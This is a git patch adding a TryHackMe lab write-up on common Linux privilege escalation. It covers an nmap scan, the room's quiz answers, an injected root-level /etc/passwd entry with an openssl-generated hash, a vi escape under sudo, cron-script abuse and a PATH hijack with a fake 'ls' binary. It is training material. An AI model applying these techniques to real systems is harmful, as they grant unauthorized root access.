From 1a18dd45a7138e9757935c5861220aa4ab609909 Mon Sep 17 00:00:00 2001
From: AbdullahRizwan101 <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Sat, 21 Nov 2020 22:25:20 +0500
Subject: [PATCH] Add files via upload

---
 TryHackMe/Common_Linux_Privesc.md | 209 ++++++++++++++++++++++++++++++
 1 file changed, 209 insertions(+)
 create mode 100644 TryHackMe/Common_Linux_Privesc.md

diff --git a/TryHackMe/Common_Linux_Privesc.md b/TryHackMe/Common_Linux_Privesc.md
new file mode 100644
index 0000000..1eae892
--- /dev/null
+++ b/TryHackMe/Common_Linux_Privesc.md
@@ -0,0 +1,209 @@
+# TryHackMe-Common Linux Privilege Escalation
+
+## NMAP
+
+```
+Nmap scan report for 10.10.235.8                                                                             [37/154]
+Host is up (0.20s latency).                               
+Not shown: 994 closed ports                               
+PORT     STATE SERVICE     VERSION         
+22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:                                            
+|   2048 37:c9:2d:7e:01:c5:ea:33:a9:e2:19:ea:66:1c:95:82 (RSA)
+|   256 9f:48:65:f7:67:2e:92:cf:73:ce:0e:69:f1:32:46:40 (ECDSA)
+|_  256 ac:5f:9a:38:23:ee:ac:14:88:9e:aa:08:df:98:f4:a7 (ED25519)
+80/tcp   open  http        Apache httpd 2.4.29 ((Ubuntu))                                                            
+|_http-server-header: Apache/2.4.29 (Ubuntu)                                                                         
+|_http-title: Apache2 Ubuntu Default Page: It works                                                                  
+111/tcp  open  rpcbind     2-4 (RPC #100000)                                                                         
+| rpcinfo: 
+|   program version    port/proto  service
+|   100000  2,3,4        111/tcp   rpcbind
+|   100000  2,3,4        111/udp   rpcbind
+|   100000  3,4          111/tcp6  rpcbind
+|   100000  3,4          111/udp6  rpcbind
+|   100003  3           2049/udp   nfs
+|   100003  3           2049/udp6  nfs
+|   100003  3,4         2049/tcp   nfs
+|   100003  3,4         2049/tcp6  nfs
+|   100005  1,2,3      39913/tcp   mountd
+|   100005  1,2,3      43930/udp   mountd
+|   100005  1,2,3      50462/udp6  mountd
+|   100005  1,2,3      53247/tcp6  mountd
+|   100021  1,3,4      38879/tcp   nlockmgr
+|   100005  1,2,3      53247/tcp6  mountd
+|   100021  1,3,4      38879/tcp   nlockmgr
+|   100021  1,3,4      40883/tcp6  nlockmgr
+|   100021  1,3,4      47812/udp   nlockmgr
+|   100021  1,3,4      57217/udp6  nlockmgr
+|   100227  3           2049/tcp   nfs_acl
+|   100227  3           2049/tcp6  nfs_acl
+|   100227  3           2049/udp   nfs_acl
+|_  100227  3           2049/udp6  nfs_acl
+139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
+445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
+2049/tcp open  nfs_acl     3 (RPC #100227)
+Service Info: Host: LINUX; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Host script results:
+|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
+|_nbstat: NetBIOS name: LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
+| smb-os-discovery: 
+|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
+|   Computer name: polobox
+|   NetBIOS computer name: LINUX\x00
+|   Domain name: \x00
+|   FQDN: polobox
+|_  System time: 2020-11-21T10:27:08-05:00
+| smb-security-mode: 
+|   account_used: guest
+|   authentication_level: user
+|   challenge_response: supported
+|_  message_signing: disabled (dangerous, but default)
+| smb2-security-mode: 
+|   2.02: 
+|_    Message signing enabled but not required
+| smb2-time: 
+|   date: 2020-11-21T15:27:08 
+|_  start_date: N/A
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 25.45 seconds
+
+```
+
+## Enumeration
+
+
+
+1. First, lets SSH into the target machine, using the credentials user3:password. This is to simulate getting a foothold on the system as a normal privilege user.
+`No answer needed`
+
+2. What is the target's hostname?
+
+
+`polobox`
+
+<img src="https://imgur.com/cIQZlOM.png"/>
+
+By reading the contents of `/etc/passwd` there are 8 users
+
+3. Look at the output of /etc/passwd how many "user[x]" are there on the system?
+
+`8`
+
+<img src="https://imgur.com/ps8gddG.png"/>
+
+4. How many available shells are there on the system?
+
+`4`
+
+<img src="https://imgur.com/1X1bWkQ.png"/>
+
+5. What is the name of the bash script that is set to run every 5 minutes by cron? 
+
+`autoscript.sh`
+
+6. What critical file has had its permissions changed to allow some users to write to it?
+
+`/etc/passwd`
+
+## Abusing SUID/GUID Files
+
+<img src="https://imgur.com/b4T3log.png"/>
+
+1. What is the path of the file in user3's directory that stands out to you?
+`/home/user3/shell`
+
+
+## Exploiting a writable /etc/passwd
+
+1. Having read the information above, what direction privilege escalation is this attack?
+`Vertical`
+
+Now to generate a simple password hash , `openssl` can do that however it is not only used for generating md5 hash it's  a cryptography toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer ,Security (TLS v1) network protocols and related cryptography standards required by them.
+
+`openssl passwd -1 --salt abc 123` so let's breakdown this command 
+
+```
+openssl , is the tool that we are using
+passwd , is telling to generate a passwd
+-1     ,it's telling to use md5 hashing algorithm
+--salt ,telling to use the salt which is a random value but in this case we are using new and 123 is the actual password on which this alogrithm will be applied
+```
+
+
+<img src="https://imgur.com/o0VewRd.png"/>
+
+2. What is the hash created by using this command with the salt, "new" and the password "123"?
+`$1$new$p7ptkEKU1HnaHpRtzNizS1`
+
+
+<img src="https://imgur.com/R8QFh9Y.png"/>
+
+3. What would the /etc/passwd entry look like for a root user with the username "new" and the password hash we created before?
+`new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash`
+
+## Escaping Vi Editor
+
+Use "su" to swap to user8, with the password "password"
+
+<img src="https://imgur.com/EBlBf5b.png"/>
+
+Run it with `sudo /usr/bin/vi`
+
+<img src="https://imgur.com/UkunmAC.png"/>
+
+<img src="https://imgur.com/UySCvQ2.png"/>
+
+1. `sudo -l` command, what does this user require (or not require) to run vi as root?
+`NOPASSWD`
+
+
+## Exploiting Crontab
+
+We can see a cronjob running as `root` user
+
+<img src="https://imgur.com/C6lsigg.png"/>
+
+So now we have to create a payload and append it to the cron script
+
+<img src="https://imgur.com/GOE3YSW.png"/>
+
+<img src="https://imgur.com/Ld6hwUh.png"/>
+
+<img src="https://imgur.com/1XcVEuU.png"/>
+
+1. What directory is the "autoscript.sh" under?
+
+`/home/user4/Desktop`
+
+## Exploiting PATH Variable
+
+<img src="https://imgur.com/m0y30wa.png"/>
+
+1. Let's go to user5's home directory, and run the file "script". What command do we think that it's executing?
+`ls`
+
+<img src="https://imgur.com/JdKqiXI.png"/>
+
+2. What would the command look like to open a bash shell, writing to a file with the name of the executable we're imitating
+`echo "/bin/bash" `
+
+3. Great! Now we've made our imitation, we need to make it an executable. What command do we execute to do this?
+
+`chmod +x ls`
+
+Now we must edit the $PATH variable to do this we must include the path for our `ls` binary
+
+`export PATH=/tmp:$PATH` , when we run it in bash it would just invoke a bash 
+
+<img src="https://imgur.com/aJ8smTM.png"/>
+
+<img src="https://imgur.com/tDyqlo0.png"/>
+
+Now we are root !
+
+To revert back and use `ls` command we can just edit the enviromental variable `$PATH` and remove the `/tmp` from it 
+
+<img src="https://imgur.com/I4iUuce.png"/>
\ No newline at end of file